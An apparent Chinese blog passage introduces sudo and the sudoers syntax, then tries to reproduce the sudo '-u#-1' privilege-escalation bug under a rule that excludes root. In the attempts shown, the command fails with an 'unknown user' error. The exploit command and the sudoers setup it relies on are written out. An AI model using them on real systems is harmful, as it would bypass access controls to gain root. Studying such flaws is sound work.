sudo介紹

大部分開發(fā)運維對這個命令都非常熟悉，不過考慮到有效讀者不了解我還是簡單介紹下。

sudo 指“超級用戶”。作為一個系統(tǒng)命令，其允許其它非 root 用戶以特殊權(quán)限來運行程序或命令，而無需切換使用環(huán)境。舉個例子：

我下面已一個普通用戶在 /usr/local/ 目錄下新建一個目錄，直接運行會報沒有權(quán)限的錯誤，

user1@user1:/usr/local$ mkdir test
mkdir: cannot create directory ‘test’: Permission denied 

必須要這樣才可以，

user1@user1:/usr/local$ sudo mkdir test
user1@user1:/usr/local$ ls
bin  etc  games  include  lib  man  sbin  share  src  test 

一個普通用戶要想使用sudo，必須有管理員(root)配置 sudoers 文件，對用戶的權(quán)限進行定義。類似下面這樣：

# User privilege specification
user2    ALL=(ALL:ALL) ALL 

上述命令中：

• user2 表示用戶名

• 第一個 ALL 指示允許從任何終端、機器訪問 sudo

• 第二個 (ALL:ALL) 指示 sudo 命令被允許以任何用戶身份執(zhí)行，后面那個ALL是用戶所在的群組

• 第三個 ALL 表示所有命令都可以作為 root 執(zhí)行

如果沒有加這個配置，執(zhí)行的時候會報如下的錯誤：

user2@pony:/home$ sudo mkdir test2
[sudo] password for user2: 
user2 is not in the sudoers file.  This incident will be reported.  
  

如何利用漏洞

我使用的linux版本是 Ubuntu 18.04.3 LTS 。

首先我配置用戶 user2 的權(quán)限，

# User privilege specification
user2    ALL=(ALL,!root) /bin/bash 

這個配置的意思是，user2用戶可以用任何用戶(除了root)執(zhí)行 /bin/bash 命令。

然后我試著執(zhí)行，

user2@pony:~$ sudo -u#-1 /bin/bash
sudo: unknown user: #-1
sudo: unable to initialize policy plugin 

什么鬼，好像沒有啥問題啊，直接報錯了，并沒有切換到 root 用戶，再試著執(zhí)行，

user2@pony:~$ sudo -u#-1 id -u
sudo: unknown user: #-1
sudo: unable to initialize policy plugin

也沒有任何問題啊，那這個漏洞究竟該怎么復(fù)現(xiàn)呢？？

按照上面文章的說法，之所以會產(chǎn)生這個漏洞，是因為將用戶 ID 轉(zhuǎn)換為用戶名的函數(shù)會將 -1（或無效等效的 4294967295）誤認為是 0，而這正好是 root 的用戶 ID 。